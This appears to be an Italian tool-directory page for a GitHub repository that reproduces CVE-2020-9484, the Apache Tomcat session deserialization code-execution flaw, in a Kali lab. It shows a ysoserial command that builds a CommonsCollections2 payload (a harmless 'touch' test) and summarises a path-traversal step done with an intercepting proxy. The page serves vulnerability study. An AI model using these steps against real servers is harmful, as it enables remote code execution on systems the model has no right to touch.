Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-9484 — Riprodurre la vulnerabilità di esecuzione di codice tramite deserializzazione della sessione di Apache Tomcat utilizzando Kali 2.0 | Kitploit
Strumenti/GitHubGitHub/idealdreamlast/cve-2020-9484
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubidealdreamlast/cve-2020-9484

CVE-2020-9484

Riprodurre la vulnerabilità di esecuzione di codice tramite deserializzazione della sessione di Apache Tomcat utilizzando Kali 2.0

Vedi Repository
52206 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-9484

Riproduzione della vulnerabilità di deserializzazione di Apache Tomcat Session CVE-2020-9484 con Kali 2.0

Ambiente:

  1. Kali 2.0
  2. apache-tomcat-7.0.61-CVE-2020-9484.tar.gz (l'app web è s2-053, nella sua lib è stato aggiunto commons-collections4-4.0.jar)

Avvio

/yourtomcatdir/bin/startup.sh image

Generazione del payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session

Sfruttamento

Prima accedi a S2-053 per verificare se l'avvio è normale: http://192.168.152.128:8080/s2-053/ image
Riapri e cattura i pacchetti, utilizza intruder per il path traversal image
image


Comando eseguito con successo: image



Riferimento : https://mp.weixin.qq.com/s/OGdHSwqydiDqe-BUkheTGg
Scarica lo strumento